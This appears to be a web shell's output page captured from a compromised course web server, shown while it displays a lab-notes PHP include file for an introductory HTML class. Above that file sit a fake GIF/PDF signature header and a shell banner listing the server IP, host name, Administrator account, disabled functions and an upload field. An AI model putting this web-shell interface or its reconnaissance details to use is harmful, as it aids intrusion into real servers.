GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1022/Labs/ |
Upload File : |
<!-- /JimMartinson/CST1022/Labs/Labnotes.phpinc --> <fieldset id="notes"><legend>Notes:</legend> <div> <b>We will be using the following foundation tags in every html page throughout this class:</b> <ol> <li>The HTML 5 DOCTYPE: <span class="highEL copyText" id="spanDOCTYPE"><!DOCTYPE html></span>.</li> <li>An html tag with the <span class="highATT">lang</span> attribute set to <span class="highVAL">en</span>: <span class="highEL copyText"><html <span class="highATT">lang="<span class="highVAL">en</span>"</span>></span>.</li> <li>A <span class="highELE">head</span> section containing: <ol style="list-style-type: lower-roman"> <li>A <span class="highELE">title</span> tag with the title directed above: <span class="copyText"><span class="highEL"><title></span><span class="highINH">replace_with_title_above</span><span class="highEL"></title></span></span>.</li> <li>The meta character set tag <span class="highEL copyText"><meta <span class="highATT">charset="<span class="highVAL">utf-8</span>"</span>></span>.</li> <li>A <span class="highELE">link</span> tag to the <span class="highVAL">site.css</span> file: <span class="highEL copyText"><link <span class="highATT">href="<span class="highVAL">site.css</span>"</span> <span class="highATT">rel="<span class="highVAL">stylesheet</span>"></span></span></li> <li>A <span class="highELE">script</span> tag to the <span class="highVAL">site.js</span> file: <span class="highEL copyText"><script <span class="highATT">src="<span class="highVAL">site.js</span>"</span>></script></span></li> </ol> </li> <li>A <span class="highELE">body</span> section containing: <ol> <li>An <span class="highELE">h1</span> heading as the first element in the body with content the same as the title above.</li> <li>The rest of your html code... <span class="note">Except for any needed internal <span class="highELE">style</span> element.</span></li> </ol> </li> </ol> </div> <div class="hp"> The <b>HTML</b> in the instructions is color coded to make it easier for you to understand: <ul> <li>Elements (tags) are color coded like <span class="highELE">tag</span>.</li> <li>Tag attributes are color coded like <span class="highATT">attribute</span>.</li> <li>Attribute values are color coded like <span class="highVAL">value</span>.</li> <li>The innerHtml (content) for elements (tags) are color coded like <span-content>innerHtml</span-content>.</li> </ul> The <b>CSS</b> in the instructions is color coded to make it easier for you to understand: <ul> <li>CSS selectors are color coded like <span class="highCSS">selector</span>.</li> <li>CSS properties are color coded like <span class="highCSP">property</span>.</li> <li>CSS property values are color coded like <span class="highCSV">value</span>.</li> </ul> </div> <div class="hp"> Further, instructions for CSS, HTML, and JavaScript have a background color: <ul> <li> For the first or only page: <ul> <li class="css">CSS instuctions have this background color.</li> <li class="page">HTML instuctions have this background color.</li> <li class="js">JavaScript instuctions have this background color.</li> </ul> </li> <li> For a second page: <ul> <li class="cssB">CSS instuctions have this background color.</li> <li class="pageB">HTML instuctions have this background color.</li> <li class="jsB">JavaScript instuctions have this background color.</li> </ul> </li> </ul> </div> <? // Search for a Lab notes file and include it. // Filename is in the format: Lab00Notes.phpinc where 00 is the current lab number. $dirs = explode("/",dirname($_SERVER['SCRIPT_FILENAME'])); $dirLast = $dirs[count($dirs)-1]; $filename = $dirLast.'Notes.phpinc'; $filepath = dirname($_SERVER['SCRIPT_FILENAME']).'/'.$filename; if ( file_exists($filepath) ) { include($filename); } ?> </fieldset>